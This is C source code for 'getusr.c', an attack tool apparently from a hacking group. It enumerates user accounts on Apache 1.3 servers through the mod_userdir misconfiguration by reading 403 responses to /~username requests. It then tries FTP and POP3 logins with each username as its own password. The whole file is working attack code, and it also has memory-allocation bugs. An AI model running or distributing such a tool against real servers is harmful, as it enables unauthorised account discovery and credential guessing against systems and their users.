/* * getusr.c by CoKi * * This tool tries to find users in a Apache 1.3.* * server through wrong default configuration of * module mod_userdir * * Use: ./getusr [options] -h -u * -h Host * -u Users file * Options * -f Try log on via FTP * -p Try log on via POP3 * * No System Group - http://www.nosystem.com.ar * */ #include #include #include #include #include #include #include #include #include #include #include #include #define DATAMAX 50 #define BUFFER 1000 #define ERROR -1 #define TIMEOUT 3 #define HTTP_PORT 80 #define FTP_PORT 21 #define POP3_PORT 110 void use(char *program); int connect_timeout(int sfd, struct sockaddr *serv_addr, socklen_t addrlen, int timeout); void vrfy_apache(char *host); void vrfy_vuln(char *host); int test_user(char *host, char *user); int trylogonFTP(char *host, char *user, char *pass); int mkconn(char *host, int port); int trylogonPOP3(char *host, char *user, char *pass); struct hostent *he; char **fuser; int sockfd; struct sockaddr_in dest_dir; int main(int argc, char *argv[]) { FILE *userlist; char c, *host=NULL, *ulist=NULL; char user[DATAMAX]; int ucant=0, cant=0, flogged=0, plogged=0, optftp=0, optpop=0, stop=0, i; if(argc < 2) use(argv[0]); while((c = getopt(argc, argv, "h:u:fp")) != EOF) { switch(c) { case 'h': host = optarg; break; case 'u': ulist = optarg; break; case 'f': optftp = 1; break; case 'p': optpop = 1; break; default : use(argv[0]); break; } } if(host == NULL) use(argv[0]); if(ulist == NULL) use(argv[0]); printf("\n getusr.c by CoKi \n\n"); printf(" [+] verifying list:\t"); fflush(stdout); if((userlist = fopen(ulist, "r")) == NULL) { printf("Failed\n\n"); exit(1); } while(!feof(userlist)) if('\n' == fgetc(userlist)) ucant++; rewind(userlist); printf("OK (%d users)\n", ucant); fuser = (char **)malloc(sizeof(ucant)); printf(" [+] verifying host:\t"); fflush(stdout); if((he=gethostbyname(host)) == NULL) { herror("Error"); printf("\n"); exit(1); } printf("OK\n"); printf(" [+] connecting:\t"); fflush(stdout); if(mkconn(host, HTTP_PORT) == ERROR) { printf("Closed\n\n"); exit(1); } printf("OK\n"); close(sockfd); vrfy_apache(host); vrfy_vuln(host); printf(" [+] searching for system accounts...\n"); fflush(stdout); while(!feof(userlist)) { if(fgets(user, sizeof(user), userlist) == NULL) break; user[strlen(user)-1] = '\0'; if(test_user(host, user) == 0) { printf(" found: %s\n", user); fuser[cant] = (char *)malloc(sizeof(user)); memcpy(fuser[cant],user,strlen(user)); memset(fuser[cant]+strlen(user),0,1); cant++; } } if(cant == 0) { printf(" no users found\n\n"); exit(1); } if(optftp == 1) { stop = 0; printf(" [+] trying log on via FTP...\n"); printf(" [+] connecting:\t"); fflush(stdout); if(mkconn(host, FTP_PORT) == ERROR) { printf("Closed\n"); stop = 1; } if(!stop) { printf("OK\n"); close(sockfd); for(i=0; i < cant; i++) { if(trylogonFTP(host, fuser[i], fuser[i]) == 0) { printf(" logged in: %s\n", fuser[i]); flogged++; } } if(flogged == 0) printf(" no users logged in\n"); } } if(optpop == 1) { stop = 0; printf(" [+] trying log on via POP3...\n"); printf(" [+] connecting:\t"); fflush(stdout); if(mkconn(host, POP3_PORT) == ERROR) { printf("Closed\n"); stop = 1; } if(!stop) { printf("OK\n"); close(sockfd); for(i=0; i < cant; i++) { if(trylogonPOP3(host, fuser[i], fuser[i]) == 0) { printf(" logged in: %s\n", fuser[i]); plogged++; } } if(plogged == 0) printf(" no users logged in\n"); } } printf("\n"); fclose(userlist); } void use(char *program) { printf("Use: %s [options] -h -u \n", program); printf(" -h\tHost\n"); printf(" -u\tUsers file\n"); printf(" Options\n"); printf(" -f\tTry log on via FTP\n"); printf(" -p\tTry log on via POP3\n"); exit(1); } int connect_timeout(int sfd, struct sockaddr *serv_addr, socklen_t addrlen, int timeout) { int res, slen, flags; struct timeval tv; struct sockaddr_in addr; fd_set rdf, wrf; fcntl(sfd, F_SETFL, O_NONBLOCK); res = connect(sfd, serv_addr, addrlen); if (res >= 0) return res; FD_ZERO(&rdf); FD_ZERO(&wrf); FD_SET(sfd, &rdf); FD_SET(sfd, &wrf); bzero(&tv, sizeof(tv)); tv.tv_sec = timeout; if (select(sfd + 1, &rdf, &wrf, 0, &tv) <= 0) return -1; if (FD_ISSET(sfd, &wrf) || FD_ISSET(sfd, &rdf)) { slen = sizeof(addr); if (getpeername(sfd, (struct sockaddr*)&addr, &slen) == -1) return -1; flags = fcntl(sfd, F_GETFL, NULL); fcntl(sfd, F_SETFL, flags & ~O_NONBLOCK); return 0; } return -1; } void vrfy_apache(char *host) { char buf[BUFFER], sendstr[DATAMAX]; printf(" [+] verifying Apache:\t"); fflush(stdout); if(mkconn(host, HTTP_PORT) == ERROR) printf("Closed\n"); sprintf(sendstr, "HEAD / HTTP/1.0\n\n"); send(sockfd, sendstr, sizeof(sendstr), 0); bzero(buf, sizeof(buf)); recv(sockfd, buf, sizeof(buf), 0); if(strstr(buf, "Server: Apache")) printf("OK\n"); else { printf("NO\n\n"); exit(1); } close(sockfd); } void vrfy_vuln(char *host) { char buf[BUFFER], sendstr[DATAMAX]; printf(" [+] vulnerable:\t"); fflush(stdout); if(mkconn(host, HTTP_PORT) == ERROR) printf("Closed\n"); bzero(sendstr, sizeof(sendstr)); sprintf(sendstr, "GET /~root\n"); send(sockfd, sendstr, sizeof(sendstr), 0); recv(sockfd, buf, sizeof(buf), 0); if(strstr(buf, "403")) printf("OK\n"); else { printf("NO\n\n"); exit(1); } close(sockfd); } int test_user(char *host, char *user) { char buf[BUFFER], sendstr[DATAMAX]; if(mkconn(host, HTTP_PORT) == ERROR) printf(" Closed\n"); bzero(sendstr, sizeof(sendstr)); sprintf(sendstr, "GET /~%s\n", user); send(sockfd, sendstr, sizeof(sendstr), 0); recv(sockfd, buf, sizeof(buf), 0); if(strstr(buf, "403")) return 0; else return 1; close(sockfd); } int trylogonFTP(char *host, char *user, char *pass) { char buf[BUFFER], *senduser, *sendpass; senduser = malloc(sizeof(user+6)); sendpass = malloc(sizeof(pass+6)); sprintf(senduser,"USER %s\n",user); sprintf(sendpass,"PASS %s\n",pass); if(mkconn(host, FTP_PORT) == ERROR) printf(" Closed\n"); bzero(buf,sizeof(buf)); recv(sockfd,buf,sizeof(buf),0); send(sockfd,senduser,strlen(senduser), 0); bzero(buf,sizeof(buf)); recv(sockfd,buf,sizeof(buf),0); send(sockfd,sendpass,strlen(sendpass), 0); bzero(buf,sizeof(buf)); recv(sockfd,buf,sizeof(buf),0); if(strstr(buf, "230")) return 0; else return 1; close(sockfd); } int mkconn(char *host, int port) { if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) { perror("Error"); printf("\n"); exit(1); } dest_dir.sin_family = AF_INET; dest_dir.sin_port = htons(port); dest_dir.sin_addr = *((struct in_addr *)he->h_addr); bzero(&(dest_dir.sin_zero), 8); if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir, sizeof(struct sockaddr), TIMEOUT) == ERROR) { return ERROR; } return 0; } int trylogonPOP3(char *host, char *user, char *pass) { char buf[BUFFER], *senduser, *sendpass; senduser = malloc(sizeof(user+6)); sendpass = malloc(sizeof(pass+6)); sprintf(senduser,"USER %s\n",user); sprintf(sendpass,"PASS %s\n",pass); if(mkconn(host, POP3_PORT) == ERROR) printf(" Closed\n"); bzero(buf,sizeof(buf)); recv(sockfd,buf,sizeof(buf),0); send(sockfd,senduser,strlen(senduser), 0); bzero(buf,sizeof(buf)); recv(sockfd,buf,sizeof(buf),0); send(sockfd,sendpass,strlen(sendpass), 0); bzero(buf,sizeof(buf)); recv(sockfd,buf,sizeof(buf),0); if(strstr(buf, "+OK")) return 0; else return 1; close(sockfd); }